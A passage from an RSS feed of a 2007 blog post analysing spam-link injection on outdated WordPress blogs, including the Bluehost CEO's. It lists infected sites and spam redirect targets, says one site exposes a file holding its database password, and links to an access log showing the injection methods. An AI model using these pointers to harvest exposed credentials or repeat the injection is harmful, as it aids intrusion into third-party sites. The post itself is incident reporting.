<li> <strong>jean-cyril.com</strong> - <a href="http://blog.kakkoi.net/uri/d3d3LmplYW4tY3lyaWwuY29tL3dwLWluY2x1ZGVzLw.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams link redirect to <tt>www.901am.com/?page=2157</tt>. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.</li>
<li> <strong>floaridablog.org</strong> - <a href="http://blog.kakkoi.net/uri/ZmxvcmlkYWJsb2cub3JnL3dvcmRwcmVzcy93cC1pbmNsdWRlcy8.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams redirect to <tt>communications.uml.edu/sunrise/?id=1076</tt> (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.</li>
</ul>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Hiding from search engine Spiders</h2>
<p>First, I did some more comparative search at <a href="http://archive.org" rel="external" rev="webservices:alexa">archive.org</a> for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.</p>
<ul>
<li>http://web.archive.org/web/*/http://www.howardowens.com</li>
<li>http://web.archive.org/web/*/http://www.mattheaton.com</li>
</ul>
<p>Out of boredom I cloaked myself as the following agents.</p>
<ul>
<li>Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net</li>
<li>Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com</li>
<li>Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com</li>
<li>Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
</ul>
<p>Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler &#038; spider from spying their joy-ride-spamhouse.
</p>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Summary</h2>
<p>bits &#038; bytes from this accident we knew that</p>
<ul>
<li>Most of the site inject are running on wordpress 2.0.6 &#038; below</li>
<li><strong>allow_furl_open</strong> is set to true for this injection to work</li>
<li>Most of the blogs owner is unaware about the spams links (cloacking)</li>
</ul>
<p>Checkout Murray <a href="http://gmodules.com/ig/proxy?url=http://www.murrayc.com/blog/wp-content/uploads/2007/11/access_log.txt" rel="nofollow external" class="exturl icn-r" type="text/plain">access log</a>, it will give you some ideas with the remote injections methods.</p>
<h2>Update </h2>
<dl>
<dt>Dec 03 2007</dt>
<dd>All the spams link to <tt>howardowens.com</tt> page has been removed. I havent talk with howardowens but I assume howard&#8217;s site is being injected the same way like Matt Heaton blog.</dd>
<dt>Dec 04 2007</dt>
<dd>Mattheaton.com has a minor update, the spams now inject on both header and footer.<br />
<tt>tangonoticias.com:7070/d_pill/577.html</tt>.<br />
As tangonoticias.com is running on Joomla CMS they create a static &#8220;Wordpress&#8221; on port 7070 (Real Network Server &#038; RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. <a href="http://64.233.167.104/search?q=cache:xjPu95m8yEAJ:mattheaton.com&#038;hl=en&#038;ct=clnk&#038;cd=1&#038;gl=us">Google Cache</a> <small>(Nov 12)</small> </dd>
<dt>Dec 11 2007</dt>
<dd>Matt heaton has been purified. He&#8217;s now using latest version of Wordpress (2.3.1). You can still view it on cached thought &#038; <a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow external" rev="sharepic:gallery">screenshot</a>. </dd>
</dl>
<h2>Related Post</h2>
<ul class="xoxo">
<li><a href="wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><small>Jan 31st, 2008</small> - <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h2 id="related-entries" class="mgb-">External Links</h2>
<ul class="xoxo pdt exturl">
<li><a href="http://www.mattheaton.com">Bluehost Hostmonster CEO&#8217;s blog</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LnJvYnRleC5jb20vZG5zL3dvcmRwcmVzcy5uZXQuaW4uaHRtbA.curie,80,302" rev="robtex:lookup" rel="nofollow external robots-nofollow" title="Lookup via robtext">DNS Lookup results for wordpress.net.in</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LmFib3V0dXMub3JnL01hdHRIZWF0b24uY29t.curie,80,302" rel="external nofollow robots-nofollow" rev="aboutus:mattheaton" title="View mattheaon.com wiki on Aboutus.org">Aboutus.org wiki on MattHeaton.com</a></li>
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3Lm11cnJheWMuY29tL2Jsb2cvcGVybWFsaW5rLzIwMDcvMTEvMTYvbXktd29yZHByZXNzLWNyYWNrZWQv.curie,80,302" rel="external nofollow robots-nofollow" rev="wordpress:hacked" title="My Wordpress Cracked">Murray&#8217;s Blog My Wordpress Cracked</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
